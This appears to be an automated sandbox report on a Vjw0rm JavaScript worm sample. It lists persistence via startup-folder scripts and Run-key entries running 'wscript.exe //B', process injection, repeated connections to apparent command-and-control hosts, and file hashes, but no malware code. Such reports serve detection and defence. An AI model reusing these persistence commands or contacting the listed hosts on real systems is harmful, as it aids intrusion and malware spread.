Max time network
152s
Command Line
Signatures
Vjw0rm
Blocklisted process makes network request
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\wscript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2.js | C:\Windows\system32\wscript.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bBPGleXeSh.js | C:\Windows\System32\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bBPGleXeSh.js | C:\Windows\System32\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2.js | C:\Windows\System32\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bBPGleXeSh.js | C:\Windows\System32\wscript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\2.js\"" | C:\Windows\System32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\2.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\2.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\software\microsoft\windows\currentversion\run | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\2.js\"" | C:\Windows\System32\wscript.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1976 wrote to memory of 4884 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 1976 wrote to memory of 4884 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 1976 wrote to memory of 5088 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 1976 wrote to memory of 5088 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 5088 wrote to memory of 1756 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\wscript.exe |
| PID 5088 wrote to memory of 1756 | N/A | C:\Windows\System32\wscript.exe | C:\Windows\System32\wscript.exe |
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\2.js
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\bBPGleXeSh.js"
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\2.js"
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\bBPGleXeSh.js"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | javaautorun.duia.ro | udp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 8.8.8.8:53 | oyo.powrkenken.info | udp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 20.50.73.10:443 | tcp | |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 91.193.75.231:5443 | javaautorun.duia.ro | tcp |
| N/A | 194.5.98.71:46077 | oyo.powrkenken.info | tcp |
Files
memory/4884-132-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\bBPGleXeSh.js
| MD5 | 66dc2636a8030d46088ffea48edca927 |
| SHA1 | 0b69c990c12f471bae591feff36810bee88dc8be |
| SHA256 | f65f356f01c0807a3142dcad0b4ae406dbf835dbe80fe8a6aca8abf59c74242e |
| SHA512 | 8084c417d30fec47c5b519657f2651bffc7c1c9d403eb5356aae6e47ee572610f4f4095f4f65cd2fef54c1e47592fb7e64e6c2f598539115c84b2647e6b97e0a |
memory/5088-134-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\2.js
| MD5 | 23e6dafa419a763923005e18ac40b8b4 |
| SHA1 | 8e1d466bbf8278d773c30198fd166c8f2cc95134 |
| SHA256 | 12736919f6e945cb175325bcffb7ca8fff02db430fea5803c76a73cc2145436c |
| SHA512 | 9db15577ef3b80a5503c561c01914548e5c2b8a56d59673a1d48d2fa3ba205a654504adc7d297258bb70ee681e81d4b4d6367fe1d7e244ceaaff9e00780efae3 |
memory/1756-136-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2.js
| MD5 | 23e6dafa419a763923005e18ac40b8b4 |
| SHA1 | 8e1d466bbf8278d773c30198fd166c8f2cc95134 |
| SHA256 | 12736919f6e945cb175325bcffb7ca8fff02db430fea5803c76a73cc2145436c |
| SHA512 | 9db15577ef3b80a5503c561c01914548e5c2b8a56d59673a1d48d2fa3ba205a654504adc7d297258bb70ee681e81d4b4d6367fe1d7e244ceaaff9e00780efae3 |
C:\Users\Admin\AppData\Roaming\bBPGleXeSh.js
| MD5 | 66dc2636a8030d46088ffea48edca927 |
| SHA1 | 0b69c990c12f471bae591feff36810bee88dc8be |
| SHA256 | f65f356f01c0807a3142dcad0b4ae406dbf835dbe80fe8a6aca8abf59c74242e |
| SHA512 | 8084c417d30fec47c5b519657f2651bffc7c1c9d403eb5356aae6e47ee572610f4f4095f4f65cd2fef54c1e47592fb7e64e6c2f598539115c84b2647e6b97e0a |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bBPGleXeSh.js
| MD5 | 66dc2636a8030d46088ffea48edca927 |
| SHA1 | 0b69c990c12f471bae591feff36810bee88dc8be |
| SHA256 | f65f356f01c0807a3142dcad0b4ae406dbf835dbe80fe8a6aca8abf59c74242e |
| SHA512 | 8084c417d30fec47c5b519657f2651bffc7c1c9d403eb5356aae6e47ee572610f4f4095f4f65cd2fef54c1e47592fb7e64e6c2f598539115c84b2647e6b97e0a |